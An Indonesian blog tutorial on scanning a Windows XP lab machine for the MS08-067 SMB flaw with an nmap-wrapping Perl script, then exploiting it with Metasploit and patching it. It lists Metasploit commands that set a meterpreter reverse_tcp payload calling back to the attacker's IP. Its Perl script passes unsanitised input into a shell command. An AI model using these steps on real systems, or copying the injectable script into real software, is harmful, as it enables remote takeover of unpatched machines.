• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    SBS opening Fix Autosultan

    Autosultan zonamotivasi
    Januari 25, 2022
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "SMB Scanning Vulnerability"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeVulnSMB Scanning Vulnerability
    SMB Scanning Vulnerability

    SMB Scanning Vulnerability

    Simpan Postingan
    winHack
    Terima Kasih T.I Sniper telah memberikan kesempatan menulis disini dan ini adalah tulisan saya yang pertama kali di T.I Sniper. Langsung saja, berdasarkan pengalaman saya, setelah install Windows XP, saya kira aman – aman saja dan ternyata di website resmi microsoft menyebutkan vulnerability pada netapi32.dll / ms08_067. Vulnerability ini ditemukan pada tahun 2008 di CVE-2008-4250. “An attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit” inilah yang disebutkan di situs Microsoft. Saya akan memberikan step by step untuk mengidentifikasi vulnerability netapi32.dll dan patching system :
    Skenario


    Attacker     : Ubuntu 10.04
    Target        : Windows XP SP 2 Di Virtualbox

    1. Download Nmap
    Ketik ini pada konsole terminal

    sudo su apt-get install nmap

    2. Untuk melakukan analisa pada window, saya membuat sebuah code sederhana dari Perl dan memanfaatkan perintah nmap. Kita tidak perlu install Perl di ubuntu karena default Perl sudah terinstall. Copas kode berikut di gedit dan save dengan nama smb_scan.pl :
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    #!/usr/bin/perl
    # Author : h3ll0s
    # Date      : 30 Maret 2012
    # SMB Scanning Vulnerabillity
    # Used nmap --script smb-check-vulns.nse -p445 <host>
    # Spesial Thank's To : [3rr0r c0de | PasuruanCyber] [BinusHacker]
    # http://www.nmap.org
    use strict;
    system('cls','clear');
       system('title SMB Scanning.....');
          print"\n";
          print "\t//+ + + + + + + + + + + + + + + + + +//\n";
          print "\n";;
          print "\t  =    SMB Scanning Vulnerability   =\n";
          print "\n";;
          print "\t//+ + + + + + + + + + + + + + + + + +//\n";
          print "\n";;
    print "Masukkan Host : ";
    chomp(my $net = <STDIN>);
    my $host = $net;
    print "Menunggu Proses Scan\n";
    print "$host\n";
    `nmap --script smb-check-vulns.nse -p445 '$host' >> hasil.txt`;
    print "Selesai";
    Meskipun tanpa code script Perl tersebut kita bisa mengetikkan perintah ini pada terminal konsole
    nmap –script smb-check-vulns.nse -p445 <target>
    Kenapa saya mengemasnya kedalam Perl, soalnya saya sendiri sering lupa sama perintah nmap. Maka alternatifnya adalah dengan membuat code sederhana tersebut. hehehehe..

    3. Jalankan Code Tersebut
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    root@h3ll0s:~# perl smb_scan.pl
    //+ + + + + + + + + + + + + + + + + +//
    =    SMB Scanning Vulnerability   =
    //+ + + + + + + + + + + + + + + + + +//
    Masukkan Host : # Isikan IP host target yang ingin di scan, misal 192.168.x.x
    Menunggu Proses Scan
    192.168.x.x
    Selesai
    root@h3ll0s:~#
    Proses scanning sudah selesai, saatnya membuka laporan scanning.
    1
    2
    3
    root@h3ll0s:~#ls
    smb_scan.pl     hasil.txt
    root@h3ll0s:~# gedit hasil.txt
    Inilah contoh isi dari hasil.txt
    hasil.txt
    Lihatlah pada line 10
    MS08-067: VULNERABLE
    Ternyata target memiliki vulnerability ms08_067, dengan memanfaatkan vulnerability tersebut kita bisa melakukan remote system Windows dengan memakai Metasploit
    4. Proses Exploit Metasploit Untuk Mendapatkan System Target
    DOWNLOAD METASPLOIT

    Download Metasploit
    msf
    Keterangan:
    search ms08_067                             : Pencarian vulnerability ms08_067 berdasarkan data Metasploit
    use exploit/windows/smb/ms08_067_netapi : Metode pilihan exploit setelah proses search
    set payload windows/meterpreter/reverse_tcp : Payload metasploit, untuk memilih payload “show payloads”
    set LHOST                                   : IP Penyerang
    set RHOST                                   : IP Target
    5. Patching Vulnerability Pada MS08_067 Di Windows
    Jangan biarkan Windows kita memiliki vulnerability ms08_067, sangat membahayakan jika ada seorang attacker mengambil alih system32, data pribadi kita bisa saja di hapus, memasang keyloger untuk mencuri informasi, memasang backdoor, mengerikan sekali.
    Untuk patching silahkan download dan install dari situs resmi Microsoft
    patch ms08_067
    Download SMB Scanner Vulnerability
    http://pastebin.com/Qdxyra2n
    Referensi :

    CVE-2008-4250
                                                                                              Salam T.I Sniper
      Vuln
      September 01, 2015 •
      Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
      T.I Sniper

      Your description here

      • Follow
      • Autosultan
      • Wa Admin Bisnis
      Copyright ©2010 - 2022 🔥 T.I Sniper.
      • Beranda
      • Cari
      • Posting
      • Trending
      • Tersimpan